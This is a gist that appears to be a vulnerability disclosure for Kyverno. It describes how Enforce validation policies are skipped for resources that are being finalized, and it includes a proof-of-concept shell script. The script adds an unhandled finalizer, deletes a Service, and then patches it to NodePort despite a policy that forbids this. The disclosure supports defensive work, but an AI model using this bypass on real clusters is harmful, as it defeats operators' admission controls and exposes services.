Skip to content

Instantly share code, notes, and snippets.

@bburky

bburky/README.md Secret

Last active April 7, 2023 22:05
Show Gist options
  • Save bburky/c137b39dd2ec48c9efd818af7507465e to your computer and use it in GitHub Desktop.
Save bburky/c137b39dd2ec48c9efd818af7507465e to your computer and use it in GitHub Desktop.
validationFailureAction: Enforce policies may be bypassed by editing resources during finalization

validationFailureAction: Enforce policies may be bypassed by editing resources during finalization

All Kyverno components, including validation, appear to ignore resources with a deletionTimestamp. A ClusterPolicy or Policy with validationFailureAction: Enforce may be bypassed by beginning deletion (finalization) of a resource before updating it. Deletion may last indefinitely if an unhandled finalizer is added to the resource before beginning deletion.

Many Kubernetes resources such as Pods are effectively "dead" as soon as they begin terminating. Even though the image: field of a Pod is mutable, modifications to a Pod's spec: are ignored during termination and the new image is not executed. Other resource kinds may not handle finalization however, or may handle it inconsistently. ConfigMaps are completely usable during finalization. It appears that during finalization, updates to LoadBalancer Services may be ignored and remain pending. However, NodePort Services updated during finalization will create a listening NodePort. CRD's behavior during finalization will vary with each custom controllers' implementation.

Because most policies and RBAC would not deny adding finalizers or deletion of resources, I believe this allows an attacker to bypass any Kyverno policy. Impact is limited if fields of the resource are immutable or updates to the resource are ignored during deletion. Policies on Pods appear to be safe because updates to the resource are ignored during termination.

I have not reviewed Kyverno's behavior for mutation, generation, image verification, etc. but it looks like Kyverno handles deletionTimestamp similarly in each of them. I am less sure what users' security expectations are for these and if they should also be considered vulnerabilities. See the following areas of Kyverno's source code for various features' handling of deletionTimestamp:

Please see the proof of concept exploit.sh script below. Tested on Kyverno v1.9.2 on both k3s and vanilla Kubernetes v1.26.3. The hostname in the final curl command may need to be edited depending on your environment. You may also need to run the commented out helm repo commands.

#!/bin/sh
# If running this file as a shell script, print each command when run:
set -x
# Install kyverno/kyverno helm chart version 2.7.2 (appVersion v1.9.2)
# helm repo add kyverno https://kyverno.github.io/kyverno/
# helm repo update
helm install kyverno kyverno/kyverno --version 2.7.2 -n kyverno --create-namespace --set replicaCount=1 --wait
# The only change from the official policy is validationFailureAction: Enforce
# https://kyverno.io/policies/best-practices/restrict_node_port/restrict_node_port/
kubectl apply -f - <<'EOF'
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: restrict-nodeport
annotations:
policies.kyverno.io/title: Disallow NodePort
policies.kyverno.io/category: Best Practices
policies.kyverno.io/minversion: 1.6.0
policies.kyverno.io/severity: medium
policies.kyverno.io/subject: Service
policies.kyverno.io/description: >-
A Kubernetes Service of type NodePort uses a host port to receive traffic from
any source. A NetworkPolicy cannot be used to control traffic to host ports.
Although NodePort Services can be useful, their use must be limited to Services
with additional upstream security checks. This policy validates that any new Services
do not use the `NodePort` type.
spec:
validationFailureAction: Enforce
background: true
rules:
- name: validate-nodeport
match:
any:
- resources:
kinds:
- Service
validate:
message: "Services of type NodePort are not allowed."
pattern:
spec:
=(type): "!NodePort"
EOF
kubectl wait ClusterPolicy restrict-nodeport --for='jsonpath={.status.ready}=true'
# Podinfo includes a ClusterIP podinfo Service, which is not blocked by the Kyverno policy
kubectl apply -k github.com/stefanprodan/podinfo//kustomize
kubectl wait deployment podinfo --for condition=Available=True
# The following correctly is denied due to the above policy:
kubectl patch service podinfo -p '{"spec":{"type":"NodePort","ports":[{"port":9898,"nodePort":32000}]}}'
# But instead, you can add a finalizer and begin deletion of the Service:
kubectl patch service podinfo -p '{"metadata":{"finalizers":["bburky.com/hax"]}}'
kubectl delete service podinfo --wait=false
# Because nothing handles the bburky.com/hax finalizer, deletion will never complete
# Typical policies and RBAC do not disallow adding finalizers or deletion
# The following is incorrectly allowed because the resource has a deletionTimestamp:
# https://github.com/kyverno/kyverno/blob/2f1ac317f4f6a5b2799f37b61237f68dd4ea35c6/pkg/webhooks/resource/validation/validation.go#L89-L91
kubectl patch service podinfo -p '{"spec":{"type":"NodePort","ports":[{"port":9898,"nodePort":32000}]}}'
# Wait a couple seconds for the Service to apply the update
sleep 3
# Even though the NodePort Service is being deleted, the update is still applied and the Service is exposed via a NodePort:
curl http://localhost:32000/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment